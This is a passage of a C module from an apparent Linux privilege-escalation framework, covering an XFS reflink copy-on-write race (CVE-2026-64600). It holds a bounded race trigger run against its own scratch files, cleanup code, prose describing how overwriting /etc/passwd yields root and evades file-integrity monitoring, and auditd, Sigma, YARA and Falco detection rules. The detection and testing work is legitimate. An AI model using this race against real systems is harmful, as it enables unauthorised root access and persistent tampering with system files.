* would emit a false "not reachable here" on a genuinely vulnerable
|
|
* host. O_DIRECT, by contrast, IS a gate: without it
|
|
* xfs_direct_write_iomap_begin is never entered and there is no race
|
|
* to exercise. */
|
|
int shared = rfx_extent_is_shared(clone);
|
|
int odirect_ok = 0;
|
|
int t = open(clone, O_RDWR | O_DIRECT);
|
|
if (t >= 0) { odirect_ok = 1; close(t); }
|
|
|
|
if (!odirect_ok) {
|
|
if (!ctx->json)
|
|
fprintf(stderr, "[-] refluxfs: phase A — O_DIRECT unavailable "
|
|
"here; the direct-I/O CoW path cannot be "
|
|
"entered, so the race is unreachable\n");
|
|
rfx_remove_scratch(scratch);
|
|
_exit(RFX_RC_SETUP_FAIL);
|
|
}
|
|
if (!ctx->json)
|
|
fprintf(stderr, "[+] refluxfs: phase A — reflink clone succeeded "
|
|
"(shared extent established) and O_DIRECT is "
|
|
"available; FIEMAP corroboration: %s. The vulnerable "
|
|
"CoW path is reachable here.\n",
|
|
shared == 1 ? "FIEMAP_EXTENT_SHARED set"
|
|
: shared == 0 ? "flag not reported — proceeding anyway"
|
|
: "FIEMAP undetermined — proceeding anyway");
|
|
|
|
/* Phase B — hard-bounded race window exercise. */
|
|
int won = 0, rounds = 0;
|
|
time_t deadline = time(NULL) + RFX_RACE_BUDGET_SECS;
|
|
for (int i = 0; i < RFX_RACE_ROUNDS && time(NULL) < deadline && !won; i++) {
|
|
/* Re-establish the shared extent each round: a successful CoW
|
|
* breaks sharing, so without this only the first round would race
|
|
* against a genuinely shared block. */
|
|
if (i > 0 &&
|
|
rfx_build_pair(scratch, donor, sizeof donor, clone, sizeof clone) != 0)
|
|
break;
|
|
int d = rfx_race_round(donor, clone);
|
|
rounds = i + 1;
|
|
if (d == 1) won = 1;
|
|
}
|
|
|
|
if (!ctx->json)
|
|
fprintf(stderr, "[i] refluxfs: phase B — %d bounded race rounds "
|
|
"fired; donor on-disk content %s\n",
|
|
rounds, won ? "DIVERGED" : "intact");
|
|
|
|
rfx_remove_scratch(scratch);
|
|
_exit(won ? RFX_RC_SHARED_WIN : RFX_RC_SHARED_NO_WIN);
|
|
}
|
|
|
|
int status;
|
|
waitpid(child, &status, 0);
|
|
|
|
if (WIFSIGNALED(status)) {
|
|
if (!ctx->json)
|
|
fprintf(stderr, "[!] refluxfs: child died by signal %d during the "
|
|
"bounded race — unexpected for a data-only bug; "
|
|
"no root was obtained\n", WTERMSIG(status));
|
|
return SKELETONKEY_EXPLOIT_FAIL;
|
|
}
|
|
if (!WIFEXITED(status)) return SKELETONKEY_EXPLOIT_FAIL;
|
|
|
|
switch (WEXITSTATUS(status)) {
|
|
case RFX_RC_SHARED_WIN:
|
|
if (!ctx->json) {
|
|
fprintf(stderr, "[!] refluxfs: CVE-2026-64600 CONFIRMED PRESENT — a "
|
|
"racing O_DIRECT write landed on a still-shared "
|
|
"block and rewrote the donor file's on-disk bytes. "
|
|
"That is the arbitrary-overwrite primitive, observed "
|
|
"empirically, contained entirely to our own scratch "
|
|
"files.\n");
|
|
fprintf(stderr, "[i] refluxfs: NOT escalated. Turning this into root "
|
|
"means pointing the same race at a file we do not "
|
|
"own (the public PoC reflink-clones /etc/passwd into "
|
|
"/var/tmp and rewrites it in place, then `su`). That "
|
|
"step persistently corrupts a system file on disk "
|
|
"with no undo, so it is documented in MODULE.md and "
|
|
"NOT bundled. Honest EXPLOIT_FAIL.\n");
|
|
}
|
|
return SKELETONKEY_EXPLOIT_FAIL;
|
|
case RFX_RC_SHARED_NO_WIN:
|
|
if (!ctx->json) {
|
|
fprintf(stderr, "[!] refluxfs: the vulnerable path IS reachable here "
|
|
"(shared extent + O_DIRECT confirmed) but the "
|
|
"deliberately under-driven race was not won in %d "
|
|
"rounds / %ds — honest EXPLOIT_FAIL.\n",
|
|
RFX_RACE_ROUNDS, RFX_RACE_BUDGET_SECS);
|
|
fprintf(stderr, "[i] refluxfs: absence of a win does NOT mean the "
|
|
"host is patched — the public PoC uses 32 writers, 8 "
|
|
"helpers and grinds far longer. Trust the version + "
|
|
"vendor-erratum verdict, not this timing result.\n");
|
|
}
|
|
return SKELETONKEY_EXPLOIT_FAIL;
|
|
case RFX_RC_NO_SHARE:
|
|
if (!ctx->json)
|
|
fprintf(stderr, "[-] refluxfs: could not establish an observably "
|
|
"shared extent (FICLONE or FIEMAP refused) — reflink "
|
|
"may be disabled on this filesystem; bug not "
|
|
"reachable here\n");
|
|
return SKELETONKEY_EXPLOIT_FAIL;
|
|
default:
|
|
if (!ctx->json)
|
|
fprintf(stderr, "[-] refluxfs: probe setup failed — no writable XFS "
|
|
"scratch directory, or O_DIRECT unavailable\n");
|
|
return SKELETONKEY_EXPLOIT_FAIL;
|
|
}
|
|
}
|
|
|
|
/* Sweep scratch directories left behind if a trigger run was killed mid-round.
|
|
* The trigger removes its own scratch dir on every normal path; this exists for
|
|
* the abnormal ones. It only ever removes directories matching our own
|
|
* prefix, inside the candidate dirs we would have used. */
|
|
static skeletonkey_result_t refluxfs_cleanup(const struct skeletonkey_ctx *ctx)
|
|
{
|
|
char dir[RFX_DIR_MAX];
|
|
bool assumed = false;
|
|
if (!rfx_find_xfs_dir(dir, sizeof dir, &assumed)) {
|
|
if (!ctx->json)
|
|
fprintf(stderr, "[i] refluxfs: no XFS scratch directory in play — "
|
|
"nothing to clean\n");
|
|
return SKELETONKEY_OK;
|
|
}
|
|
|
|
/* First: if a full-chain run backed up the overwrite target, restore it.
|
|
* The overwrite is persistent on disk, so this is the important half of
|
|
* cleanup. Restoring /etc/passwd needs write permission — run this as root
|
|
* after the pop (`su root`, then `skeletonkey --cleanup refluxfs`). */
|
|
char backup[RFX_DIR_MAX + 64];
|
|
rfx_fc_backup_path(dir, backup, sizeof backup);
|
|
struct stat bst;
|
|
if (stat(backup, &bst) == 0) {
|
|
const char *target = rfx_fc_target();
|
|
if (rfx_copy_file(backup, target) == 0) {
|
|
unlink(backup);
|
|
if (!ctx->json)
|
|
fprintf(stderr, "[+] refluxfs: restored %s from backup %s and "
|
|
"removed the backup\n", target, backup);
|
|
} else if (!ctx->json) {
|
|
fprintf(stderr, "[!] refluxfs: found a backup at %s but could not "
|
|
"write %s (need root?). Restore manually: "
|
|
"cp %s %s\n", backup, target, backup, target);
|
|
}
|
|
}
|
|
|
|
DIR *d = opendir(dir);
|
|
if (!d) return SKELETONKEY_OK;
|
|
|
|
int removed = 0;
|
|
struct dirent *e;
|
|
while ((e = readdir(d)) != NULL) {
|
|
if (strncmp(e->d_name, RFX_SCRATCH_PREFIX,
|
|
sizeof(RFX_SCRATCH_PREFIX) - 1) != 0)
|
|
continue;
|
|
char path[PATH_MAX];
|
|
snprintf(path, sizeof path, "%s/%s", dir, e->d_name);
|
|
struct stat st;
|
|
if (lstat(path, &st) != 0) continue;
|
|
if (S_ISDIR(st.st_mode)) { rfx_remove_scratch(path); removed++; }
|
|
else if (unlink(path) == 0) { removed++; }
|
|
}
|
|
closedir(d);
|
|
|
|
if (!ctx->json)
|
|
fprintf(stderr, "[+] refluxfs: cleaned %d leftover scratch entr%s under "
|
|
"%s\n", removed, removed == 1 ? "y" : "ies", dir);
|
|
return SKELETONKEY_OK;
|
|
}
|
|
|
|
#else /* !__linux__ */
|
|
|
|
static skeletonkey_result_t refluxfs_detect(const struct skeletonkey_ctx *ctx)
|
|
{
|
|
if (!ctx->json)
|
|
fprintf(stderr, "[i] refluxfs: Linux-only module (XFS reflink CoW race) "
|
|
"— not applicable here\n");
|
|
return SKELETONKEY_PRECOND_FAIL;
|
|
}
|
|
static skeletonkey_result_t refluxfs_exploit(const struct skeletonkey_ctx *ctx)
|
|
{
|
|
(void)ctx;
|
|
fprintf(stderr, "[-] refluxfs: Linux-only module — cannot run here\n");
|
|
return SKELETONKEY_PRECOND_FAIL;
|
|
}
|
|
static skeletonkey_result_t refluxfs_cleanup(const struct skeletonkey_ctx *ctx)
|
|
{
|
|
(void)ctx;
|
|
return SKELETONKEY_OK;
|
|
}
|
|
|
|
#endif /* __linux__ */
|
|
|
|
/* ----- Embedded detection rules -----
|
|
*
|
|
* Read this before deploying, because RefluXFS inverts the usual assumption:
|
|
*
|
|
* THE OBVIOUS RULE DOES NOT WORK. The canonical file-integrity anchors for a
|
|
* /etc/passwd overwrite — `-w /etc/passwd -p wa`, AIDE/Tripwire mtime+size
|
|
* comparison, `auditctl` watches on the inode — DO NOT FIRE for this CVE. The
|
|
* attacker never issues a write(2) against the victim inode; XFS applies their
|
|
* data to the shared physical block underneath it. Size, mtime and ctime are
|
|
* unchanged, and there is no kernel log output. Anyone relying on FIM to catch
|
|
* a passwd modification is blind to this bug by construction.
|
|
*
|
|
* WHAT DOES WORK, in descending order of fidelity:
|
|
* 1. The reflink itself. ioctl(fd, FICLONE=0x40049409, srcfd) is rare on a
|
|
* normal server and auditd can match the request number exactly. The
|
|
* attack REQUIRES cloning the victim file, so this is on the critical
|
|
* path. Tune out cp --reflink=auto / podman / systemd-nspawn image work.
|
|
* 2. O_DIRECT opens (openat flags & 0x4000). Also on the critical path, and
|
|
* rare outside databases and backup agents.
|
|
* 3. Content-vs-metadata drift. Because the on-disk bytes change while mtime
|
|
* does not, hashing /etc/passwd, /etc/shadow and the setuid binaries on a
|
|
* schedule and alerting when the CONTENT hash moves without a
|
|
* corresponding mtime change is a near-zero-false-positive detector for
|
|
* this class. That is what the yara rule below is for.
|
|
* Correlate 1 and 2 per-pid inside a short window; individually each is benign.
|
|
*/
|
|
static const char refluxfs_auditd[] =
|
|
"# RefluXFS — XFS reflink CoW ILOCK race (CVE-2026-64600) — auditd rules\n"
|
|
"#\n"
|
|
"# IMPORTANT: do NOT rely on `-w /etc/passwd -p wa` for this CVE. The\n"
|
|
"# overwrite is applied to the shared physical block beneath the inode; no\n"
|
|
"# write(2) ever targets /etc/passwd, and its mtime/ctime/size do not\n"
|
|
"# change. That watch will never fire. The rules below anchor on the two\n"
|
|
"# operations the attack cannot avoid.\n"
|
|
"#\n"
|
|
"# 1. The reflink clone. FICLONE = 0x40049409 (_IOW(0x94, 9, int)); matched\n"
|
|
"# exactly on the ioctl request argument, so this does not flood. If your\n"
|
|
"# auditctl build rejects hex in an argument field, use decimal 1074041865.\n"
|
|
"-a always,exit -F arch=b64 -S ioctl -F a1=0x40049409 -k skeletonkey-refluxfs-ficlone\n"
|
|
"# 2. O_DIRECT opens (O_DIRECT = 0x4000 = 16384 on x86_64/arm64; it is 0x10000\n"
|
|
"# on some other arches, so adjust if you deploy beyond x86_64/arm64). The\n"
|
|
"# race needs direct I/O to reach xfs_direct_write_iomap_begin. Tune out\n"
|
|
"# database and backup service accounts before enabling fleet-wide.\n"
|
|
"-a always,exit -F arch=b64 -S openat -F a2&0x4000 -k skeletonkey-refluxfs-odirect\n"
|
|
"# 3. Post-exploitation fallback: unprivileged process -> euid 0 with no\n"
|
|
"# setuid execve (e.g. `su` after the passwd rewrite).\n"
|
|
"-a always,exit -F arch=b64 -S setresuid -F a0=0 -F a1=0 -F a2=0 -F auid>=1000 -F auid!=4294967295 -k skeletonkey-refluxfs-priv\n"
|
|
"-a always,exit -F arch=b64 -S setuid -F a0=0 -F auid>=1000 -F auid!=4294967295 -k skeletonkey-refluxfs-priv\n";
|
|
|
|
static const char refluxfs_sigma[] =
|
|
"title: Possible CVE-2026-64600 RefluXFS XFS reflink CoW race exploitation\n"
|
|
"id: 7c1e9d52-skeletonkey-refluxfs\n"
|
|
"status: experimental\n"
|
|
"description: |\n"
|
|
" RefluXFS (CVE-2026-64600) lets any unprivileged user with write access to\n"
|
|
" a reflink-enabled XFS volume overwrite the on-disk contents of any file\n"
|
|
" they can read, by racing two O_DIRECT writers through the XFS CoW path\n"
|
|
" while the ILOCK is dropped to wait for transaction log space.\n"
|
|
" Detection note: file-integrity monitoring on the victim file DOES NOT\n"
|
|
" fire — the write bypasses the inode, leaving mtime/ctime/size untouched\n"
|
|
" and producing no kernel log output. This rule therefore keys on the two\n"
|
|
" operations the attack requires: an FICLONE reflink (ioctl request\n"
|
|
" 0x40049409) and O_DIRECT opens, correlated to the same process, plus the\n"
|
|
" post-exploitation euid-0 transition. Expect false positives from\n"
|
|
" cp --reflink, container image layering, databases and backup agents.\n"
|
|
"logsource: {product: linux, service: auditd}\n"
|
|
"detection:\n"
|
|
" ficlone: {type: 'SYSCALL', syscall: 'ioctl', a1: '0x40049409'}\n"
|
|
" odirect: {type: 'SYSCALL', syscall: 'openat', key: 'skeletonkey-refluxfs-odirect'}\n"
|
|
" uid0: {type: 'SYSCALL', syscall: 'setresuid', a0: 0, a1: 0, a2: 0}\n"
|
|
" unpriv: {auid|expression: '>= 1000'}\n"
|
|
" timeframe: 60s\n"
|
|
" condition: (ficlone and odirect) or (uid0 and unpriv)\n"
|
|
"level: high\n"
|
|
"tags: [attack.privilege_escalation, attack.t1068, cve.2026.64600]\n";
|
|
|
|
/* Unusually for a kernel bug, a yara rule is the RIGHT tool here — precisely
|
|
* because the on-disk artifact is a content change that leaves no metadata
|
|
* trace for FIM to catch. Scan /etc/passwd content, not its stat(2). */
|
|
static const char refluxfs_yara[] =
|
|
"rule refluxfs_passwd_root_bypass : cve_2026_64600 lpe file_overwrite\n"
|
|
"{\n"
|
|
" meta:\n"
|
|
" cve = \"CVE-2026-64600\"\n"
|
|
" description = \"RefluXFS (CVE-2026-64600) on-disk artifact: an /etc/passwd whose root entry has an empty password field, or an added uid-0 account. Content scanning is the right detector for this CVE because the overwrite bypasses the victim inode entirely — mtime/ctime/size never change and nothing is logged, so FIM and auditd file watches never fire. Pair with content-hash-vs-mtime drift monitoring.\"\n"
|
|
" author = \"SKELETONKEY\"\n"
|
|
" reference = \"https://cdn2.qualys.com/advisory/2026/07/22/RefluXFS.txt\"\n"
|
|
" strings:\n"
|
|
" // Canonical PoC outcome: root left with no password hash at all.\n"
|
|
" $root_nopass_sof = \"root::0:0:\"\n"
|
|
" $root_nopass_bol = \"\\nroot::0:0:\"\n"
|
|
" // A second uid-0 account appended by an attacker.\n"
|
|
" $extra_uid0 = /\\n[a-z_][a-z0-9_-]{0,30}:[^:\\n]{0,64}:0:0:/\n"
|
|
" // Shape anchor so we only match passwd-formatted files.\n"
|
|
" $passwd_shape = /root:[^:\\n]{0,64}:0:0:/\n"
|
|
" condition:\n"
|
|
" $passwd_shape and\n"
|
|
" ($root_nopass_sof at 0 or $root_nopass_bol or $extra_uid0)\n"
|
|
"}\n";
|
|
|
|
static const char refluxfs_falco[] =
|
|
"- rule: XFS reflink clone plus O_DIRECT write burst (possible CVE-2026-64600)\n"
|
|
" desc: |\n"
|
|
" RefluXFS (CVE-2026-64600) XFS reflink copy-on-write race. The attack must\n"
|
|
" reflink-clone the file it wants to overwrite and then issue concurrent\n"
|
|
" O_DIRECT writes against the clone, so the highest-fidelity signal is an\n"
|
|
" FICLONE ioctl (request 0x40049409) whose SOURCE file is owned by another\n"
|
|
" user - a normal workload almost never reflinks a file it does not own -\n"
|
|
" followed by O_DIRECT opens from the same pid. Requires an ioctl-aware\n"
|
|
" probe that exposes the request argument; where that is unavailable, fall\n"
|
|
" back to the O_DIRECT and euid-0 conditions below. Note that watching the\n"
|
|
" victim file for writes is useless here: the overwrite never touches its\n"
|
|
" inode, so no write event is ever emitted for it.\n"
|
|
" condition: >\n"
|
|
" (evt.type = ioctl and evt.arg.request = 0x40049409 and user.uid != 0) or\n"
|
|
" (evt.type = open and evt.arg.flags contains O_DIRECT and\n"
|
|
" fd.name startswith /var/tmp and user.uid != 0) or\n"
|
|
" (evt.type in (setuid, setresuid) and evt.arg.uid = 0 and\n"
|
|
" not proc.is_setuid = true and user.uid != 0)\n"
|
|
" output: >\n"
|
|
" Possible CVE-2026-64600 RefluXFS reflink CoW race\n"
|
|
" (user=%user.name proc=%proc.name pid=%proc.pid ppid=%proc.ppid evt=%evt.type fd=%fd.name)\n"
|
|
" priority: WARNING\n"
|
|
" tags: [filesystem, mitre_privilege_escalation, T1068, cve.2026.64600]\n";
|
|
|
|
const struct skeletonkey_module refluxfs_module = {
|
|
.name = "refluxfs",
|
|
.cve = "CVE-2026-64600",
|
|
.summary = "XFS reflink CoW ILOCK-cycling race (\"RefluXFS\") — a stale data-fork mapping makes a direct-I/O writer treat a still-shared block as private, overwriting the on-disk contents of any readable file; unprivileged, no userns, no offsets",
|
|
.family = "xfs",
|
|
.kernel_range = "4.11 <= K < fix (introduced 3c68d44a2b49, direct-I/O CoW allocation in iomap_begin); fixed 2f4acd0fcd86 (\"xfs: resample the data fork mapping after cycling ILOCK\", mainline 7.2-rc4, merged 2026-07-16), stable backports 7.1.4 / 6.18.39 / 6.12.96; the 6.6 / 6.1 / 5.15 / 5.14 / 5.10 / 4.19 / 4.18 LTS lines have no upstream stable fix in the CNA record at time of writing (vendors backport without bumping the base version); < 4.11 not affected. Reachable only where an XFS filesystem with reflink=1 is mounted and writable — the mkfs.xfs default since xfsprogs 5.1, and the installer default on RHEL/CentOS/Rocky/Alma/Oracle/CloudLinux 8-10, Fedora Server >= 31 and Amazon Linux 2023",
|
|
.detect = refluxfs_detect,
|
|
.exploit = refluxfs_exploit,
|
|
.mitigate = NULL, /* no runtime mitigation exists: reflink is a superblock feature that cannot be disabled on a live filesystem, O_DIRECT cannot be turned off, and SELinux/seccomp/KASLR/SMEP/SMAP are all irrelevant to a data-oriented bug. Patch the kernel and reboot. */
|
|
.cleanup = refluxfs_cleanup, /* restores /etc/passwd from the full-chain backup (run as root after the pop), then sweeps leftover scratch dirs */
|
|
.detect_auditd = refluxfs_auditd,
|
|
.detect_sigma = refluxfs_sigma,
|
|
.detect_yara = refluxfs_yara,
|
|
.detect_falco = refluxfs_falco,
|
|
.opsec_notes = "detect() combines a kernel-version gate (vulnerable iff >= 4.11 AND below the on-branch fix: backports 7.1.4 / 6.18.39 / 6.12.96, 7.2+ inherits mainline; the 6.6/6.1/5.15/5.14/5.10/4.19/4.18 lines have no upstream fix yet) with a REAL precondition probe — a writable directory on a mounted XFS filesystem, identified by statfs(2) f_type == XFS_SUPER_MAGIC rather than by a successful FICLONE, because btrfs implements FICLONE too and is unaffected. Without such a directory the verdict is PRECOND_FAIL, which is the correct answer on a stock Debian/Ubuntu host. Passively this touches nothing; under --active it additionally writes and removes two 4 KiB files to confirm reflink=1 via FICLONE. Override with SKELETONKEY_XFS_ASSUME_REFLINK=1/0. Big caveat: the exposed population is overwhelmingly RHEL-family and those vendors backport without bumping the upstream version, so on rpm-family hosts a VULNERABLE verdict speaks only to the upstream base version — detect() prints that warning rather than implying it checked the erratum. exploit() forks an isolated child that creates a private mkdtemp scratch directory on the XFS mount and works ONLY on two files it owns: (A) it writes a donor, FICLONE-clones it, and confirms via FIEMAP that the clone's extent carries FIEMAP_EXTENT_SHARED — a read-only, deterministic observation that the refcount-btree state the bug misjudges exists here, plus an O_DIRECT open check; then (B) it races 8 concurrent O_DIRECT 4 KiB writes against the clone with 2 ftruncate/fdatasync helpers cycling the ILOCK, for at most 16 rounds / 2 s, and stops — deliberately under-driven against the public PoC's 32 writers and 8 helpers. It reads the donor back with O_DIRECT (a buffered read would be served from the page cache the corruption bypasses) and reports divergence honestly. It NEVER clones or targets a file it does not own: the step that yields root — reflink-cloning /etc/passwd into a writable dir and racing writes onto its shared blocks, then `su` — persistently rewrites a system file on disk with no undo and is documented but NOT bundled. Always returns EXPLOIT_FAIL. Telemetry footprint — an ioctl(FICLONE) burst, many O_DIRECT opens of the same path, and ftruncate/fdatasync churn, all inside a scratch dir named skeletonkey-refluxfs-*; no kernel log output, no dmesg lines, and no panic/oops risk whatsoever since the bug corrupts file data rather than kernel memory (a won race damages 4 KiB of our own scratch file and nothing else — the reason this ranks far above bad_epoll/ghostlock in --auto safety despite being unverified). Artifacts are removed on every normal path; --cleanup sweeps skeletonkey-refluxfs-* leftovers if a run was killed. Blue-team note worth repeating: file-integrity monitoring on the victim file does NOT detect this attack, because the overwrite never touches the victim's inode and leaves mtime/ctime/size unchanged.",
|
|
.arch_support = "any",
|
|
};
|
|
|
|
void skeletonkey_register_refluxfs(void)
|
|
{
|
|
skeletonkey_register(&refluxfs_module);
|
|
}
|